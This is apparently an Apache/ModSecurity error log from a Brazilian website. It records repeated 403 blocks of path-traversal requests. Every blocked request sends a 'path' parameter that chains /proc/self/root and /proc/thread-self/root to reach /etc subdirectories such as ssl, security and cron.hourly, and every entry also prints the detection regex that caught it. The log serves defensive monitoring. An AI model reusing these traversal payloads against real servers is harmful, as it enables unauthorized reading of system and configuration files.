[Fri Mar 20 06:31:34.111719 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.243.128:52090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T9rninkcc-iUj5ApMxAAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:35.619274 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.243.128:52096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T9_HIg5MgXLBnicPnsgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:37.106066 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:52112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T-eoXxyEfFpUF8f9wTQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:38.647326 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.243.128:52120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T-gF0L0L-SsrnPo5WHwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:40.297361 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:45960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T_Lninkcc-iUj5ApM0AAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:41.885929 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.241.31:46110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T_TJ3M9BSuKP7CAYFwAAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:41.941357 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:45970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T_RCii7xarUs8iHZWcgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:46.540412 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:45976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0T_9a6ubjKNq_cu4bBAAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:48.119416 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.243.128:45990] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UBF1pVZ5mVmJwsFMeXQAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:49.664243 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:37434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UBRCii7xarUs8iHZWhgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:51.215957 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:37444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UB_qxLDW4GITHUkTTYgAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:52.923011 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:37446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UCNa6ubjKNq_cu4bBCgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:55.038689 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.243.128:37448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UCgF0L0L-SsrnPo5WJAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:56.337218 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.243.128:37458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UDLninkcc-iUj5ApM0wAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:57.955433 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.243.128:37462] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UDQF0L0L-SsrnPo5WKAAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:31:59.434306 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.243.128:55284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UD11pVZ5mVmJwsFMeZQAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:00.987325 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:55286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UEPqxLDW4GITHUkTTbgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:03.692276 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:55302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UEjJ3M9BSuKP7CAYFyQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:05.122238 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:55316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UFV1pVZ5mVmJwsFMeZgAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:06.519430 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:55322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UFvqxLDW4GITHUkTTcQAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:08.227005 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:55324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UGAF0L0L-SsrnPo5WKgAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
